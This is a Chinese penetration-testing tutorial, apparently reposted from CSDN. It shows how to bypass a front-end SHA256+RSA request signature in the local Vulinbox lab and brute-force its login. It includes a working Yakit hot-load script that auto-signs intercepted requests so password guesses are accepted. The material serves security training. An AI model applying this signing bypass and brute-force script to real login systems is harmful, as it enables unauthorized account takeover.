欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 科技 > IT业 > 渗透测试-前端验签绕过之SHA256+RSA

渗透测试-前端验签绕过之SHA256+RSA

2025/6/27 14:20:15 来源:https://blog.csdn.net/weixin_49125123/article/details/144472678  浏览:    关键词:渗透测试-前端验签绕过之SHA256+RSA

本文是高级前端加解密与验签实战的第2篇文章,本系列文章实验靶场为Yakit里自带的Vulinbox靶场,本文讲述的是绕过SHA256+RSA签名来爆破登录。

绕过

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

根据提示可以看出这次签名用了SHA2556和RSA两个技术进行加密。

查看源代码可以看到RSA公钥是通过请求服务器获取:

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

请求一下:http://127.0.0.1:8787/crypto/js/rsa/public/key ,可以看到公钥。

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

SHA256密钥位置:

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

Encrypt方法:

function Encrypt(word) {console.info(word);return  KEYUTIL.getKey(pubkey).encrypt(CryptoJS.HmacSHA256(word, key.toString(CryptoJS.enc.Utf8)).toString()); 
}

KEYUTIL.getKey(pubkey).encrypt是RSA1v15加密方法,在代码中可以看到先进行SHA265加密,然后再RSA加密。被加密的文本的格式同上文所示。

使用CyberChef加密:

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

替换请求,可以看到签名构造成功:

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

热加载

这是我写的Yakit热加载代码,通过beforeRequest劫持请求包,使用encryptData函数进行加密,getPubkey获取公钥,最终实现热加载自动签名功能。

getPubkey = func() {//通过请求动态获取公钥rsp, req = poc.HTTP(`GET /crypto/js/rsa/public/key HTTP/1.1
Host: 127.0.0.1:8787`)~body = poc.GetHTTPPacketBody(rsp) // 响应体return body
}encryptData = (packet) => {body = poc.GetHTTPPacketBody(packet)params = json.loads(body)name = params.usernamepass = params.passwordkey = "31323334313233343132333431323334"pemBytes = getPubkey() // 获取公钥signText = f`username=${name}&password=${pass}`sha256sign = codec.EncodeToHex(codec.HmacSha256(f`${codec.DecodeHex(key)~}`, signText)) // SHA256加密rsaSign = codec.EncodeToHex(codec.RSAEncryptWithPKCS1v15(pemBytes /*type: []byte*/, sha256sign)~) // RSA加密body = f`{"username":"${name}","password":"${pass}","signature":"${rsaSign}","key":"${key}"}`return string(poc.ReplaceBody(packet, body, false))
}//发送到服务端修改数据包
// beforeRequest = func(req){
//     return encryptData(req)
// }//调试用
packet = <<<TEXT
POST /crypto/sign/hmac/sha256/verify HTTP/1.1
Host: 127.0.0.1:8787
Content-Type: application/json
Content-Length: 179{"username":"admin","password":"password"}
TEXT
result = (encryptData(packet))
print(result)

这次不调试了,直接请求看看效果,成功热加载自动签名:

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

插入临时字典爆破,可以看到正确密码为admin123。

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词